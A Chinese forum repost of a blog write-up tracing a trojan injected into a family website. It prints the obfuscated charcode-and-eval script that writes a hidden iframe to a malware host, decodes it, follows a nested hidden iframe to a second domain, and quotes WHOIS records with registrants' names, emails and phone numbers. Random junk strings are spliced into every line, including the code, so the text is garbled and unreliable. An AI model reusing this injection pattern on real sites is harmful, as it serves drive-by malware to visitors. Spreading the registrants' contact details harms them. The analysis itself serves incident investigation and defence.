[原创]一篇刚写的分析木马手记

首发在我的博客里面， _Hz~HoNU  
86;+r'3p.  
http://www.areway.cn/?p=175 m%e^&N#%6r  
Fe_::NVvk  
ffmG~$Yh_  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： UC8vR>e\  
          itqQ)\W  
<script>t=’60,105,102,114,97,109,101, ]Y_{P~ZX  
32,115,114,99,61,104,116,116,112,58,47,47, +8LM~voB  
102,114,101,101,46,117,45,117,117,117,46,99, ri/t(m^{W  
110,47,101,114,114,111,114,46,104,116,109, 8 *4@-3Sx  
32,119,105,100,116,104,61,49,48,48,32,104, b34zhZ  
101,105,103,104,116,61,48,62,60,47,105,102, io1S9a(y  
114,97,109,101,62′; tx^92R2/  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> 0OleO9Ua  
                                                                                                  ~pHJ0g:t  
<script>t=’60,105,102,114,97,109,101,32,115, ?8Hn{3X  
114,99,61,104,116,116,112,58,47,47,102,114, QRsqPh&-  
101,101,46,117,45,117,117,117,46,99,110,47, r+imn&FK8  
101,114,114,111,114,46,104,116,109,32,119, -vyIOH,  
105,100,116,104,61,49,48,48,32,104,101,105, !7A"vTs  
103,104,116,61,48,62,60,47,105,102,114,97, 8q_1(& O  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); .o-0aBG  
document.write(t);</script> 8ku? W  
                                                                                                  pY^
pTWs(  
<html xmlns=” kVV\*"9y  
http://www.w3.org/1999/xhtml @PYW|*VS  
“> Jn@Z8%B@Z  
<head> 3x04JE3!  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> o `b`*Z  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> =jJ H^Y2  
<title>首页 - 爱生活家庭网 m(2G*}  
                                                                                                                                                    (3e;"'
k  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 qru2h #  
转换字符串后的大概内容是（谁点击后果自付）： 17e=GL  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… xCR; K]!  
                                                                                                                                  \\Y,?x_0T  
查询玉米u-uuu.cn的详细信息： zt7_r`#z  
Domain Name: u-uuu.cn Bj;\mUsk  
ROID: 20070901s10001s64972306-cn Vh 2Bz  
Domain Status: ok "nVK< Vd  
Registrant Organization: 王雷 \9046An  
Registrant Name: 王雷 }BA9Ka#%  
Administrative Email: czlovexs@126.com Z1VC5*K  
Sponsoring Registrar: 北京万网志成科技有限公司 IO}+[%ptc*  
Name Server:ns.yovole.com gsnP!2cR  
Name Server:ns1.yovole.com EYA/CI   
Registration Date: 2007-09-01 17:54 Bx+d3  
Expiration Date: 2008-09-01 17:54 }$^]dn@  
最后PING了一下地址 都没有什么….
$8jaapNm@  
                                                                                                lo"j )Zt  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. 6_W<hevI  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> \|v`l{  
<script language=”javascript” src=” {d| |q<.
-  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script EY So=  
> F;pTXt}?5  
这个玉米应该有可能是木马作者的： ^gd<lo g  
foafau.info的详细信息： [6O04"6K  
Access to INFO WHOIS information is provided to assist persons in <#zwKTmK1  
determining the contents of a domain name registration record in the [.{^"<Z<  
Afilias registry database. The data in this record is provided by #]@9qPyn  
Afilias Limited for informational purposes only, and Afilias does not Sbp  
guarantee its accuracy.  This service is intended only for query-based Kl2}o|b   
access. You agree that you will use this data only for lawful purposes Tj Mb>w9  
and that, under no circumstances will you use this data to: (a) allow, /j11,O?72  
enable, or otherwise support the transmission by e-mail, telephone, or PXa5g5!  
facsimile of mass unsolicited, commercial advertising or solicitations +-U@0&Y3M  
to entities other than the data recipient’s own existing customers; or w-r_H!-  
(b) enable high volume, automated, electronic processes that send =D{B}=D\IM  
queries or data to the systems of Registry Operator, a Registrar, or ]y.Rg{iv  
Afilias except as reasonably necessary to register domain names or nHnk#SAAu  
modify existing registrations. All rights reserved. Afilias reserves w nWgy4:  
the right to modify these terms at any time. By submitting this query, yDzdE;  
you agree to abide by this policy. ZOp^`c9~  
Domain ID:D22418703-LRMS o\&~CW~@~  
Domain Name:FOAFAU.INFO C9o$9 l+B  
Created On:20-Nov-2007 16:05:42 UTC WPtMds4  
Last Updated On:20-Nov-2007 16:05:44 UTC Og=[4?Kpk  
Expiration Date:20-Nov-2008 16:05:42 UTC ~xw5\Y^  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) ]\7lbLv  
Status:CLIENT DELETE PROHIBITED Sobtz}A*  
Status:CLIENT RENEW PROHIBITED d`85P+Qen|  
Status:CLIENT TRANSFER PROHIBITED ^,+nef?=
 
Status:CLIENT UPDATE PROHIBITED mqdOu{kQ  
Status:TRANSFER PROHIBITED n"iNKR>nW  
Registrant ID:GODA-040110615  O)O
Uy  
Registrant Name:liu hong !Ri r&gF  
Registrant Organization: * flWL  
Registrant Street1:beijing `
v~!H\q  
Registrant Street2: m*`cuSU|o  
Registrant Street3: lw s(/a*c  
Registrant City:beijing ?d4Boe0-a2  
Registrant State/Province: <>]1Y$^Y
 
Registrant Postal Code:100000 =rEA:Q`~w  
Registrant Country:CN ujx@@N  
Registrant Phone:+86.860108888777  +tIz[+u  
Registrant Phone Ext.: 3|zgDA  
Registrant FAX: Qo.Uqz.C  
Registrant FAX Ext.: o*-9J2V=J  
Registrant Email:bbbshiji@163.com vu<#wW*9  
Admin ID:GODA-240110615 L@nebT;\'  
Admin Name:liu hong 4#_$@ r  
Admin Organization: Q70bEHLA  
Admin Street1:beijing jQ?LHUE  
Admin Street2: 3?@?-q2g  
Admin Street3: [A]Ca$':  
Admin City:beijing 7-X/>v  
Admin State/Province: +TF8WZZF.d  
Admin Postal Code:100000 p0Gk j-  
Admin Country:CN nS.2C>A  
Admin Phone:+86.860108888777 )km7tA 0a  
Admin Phone Ext.: 'PpZ/ry$  
Admin FAX: N 'i,>  
Admin FAX Ext.: '#W_boN  
Admin Email:bbbshiji@163.com L7}i q0  
Billing ID:GODA-340110615 ]-:1se  
Billing Name:liu hong N xFUO0O3  
Billing Organization: 1[s0Lz  
Billing Street1:beijing g_vm&~U/'  
Billing Street2: O#:&*Mv  
Billing Street3: \_9rr6^"  
Billing City:beijing e #M iaX  
Billing State/Province: 4jGLAor|  
Billing Postal Code:100000 oNIFx5*Z  
Billing Country:CN %'0&ElQ  
Billing Phone:+86.860108888777 qp&4 1  
Billing Phone Ext.: bAiJn<  
Billing FAX: ?mU\ N0o  
Billing FAX Ext.: h>klTPM>  
Billing Email:bbbshiji@163.com 5kn+ >{jh`  
Tech ID:GODA-140110615 ('4wXD]C  
Tech Name:liu hong ! Mo`^t  
Tech Organization: L M /Ga  
Tech Street1:beijing n=o_1M|  
Tech Street2: DW|vMpU]u  
Tech Street3: 7Cy<mS  
Tech City:beijing #tDW!Xv?  
Tech State/Province:
OKAkl  
Tech Postal Code:100000 @5E,:)T*wR  
Tech Country:CN yFjVKp'P  
Tech Phone:+86.860108888777 `Mk4sKU\a  
Tech Phone Ext.: :Q7mV%%  
Tech FAX: xA #H0?a]  
Tech FAX Ext.: M{E{NK  
Tech Email:bbbshiji@163.com 2h q>T&8  
Name Server:NS27.DOMAINCONTROL.COM k>5O`Y:  
Name Server:NS28.DOMAINCONTROL.COM "SR5wr   
Name Server: Hb!6ZEmN%  
Name Server: bX2"89{  
Name Server: F
w"$A0  
Name Server: 6P*O&1hv  
Name Server: 9i%9  
Name Server: 6I>^Pf'ND  
Name Server: S4bBafj[I  
Name Server: p/*"4-S  
Name Server: @G*.1;jO  
Name Server: OipqoI2  
Name Server: d~Mg vh'  
                                                                                                          AVFjBybu9  
接着下载每个文件里面的代码： !h: Q  
一步一步看.. d#>y}H9  
:=fvZAWD  
hO( RZ'{  
]tY:,Mfs  
_|zBUrN  
_Y!sVJ){,c  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

看过了就是没看懂。。。

要是有全部 就好了 传上来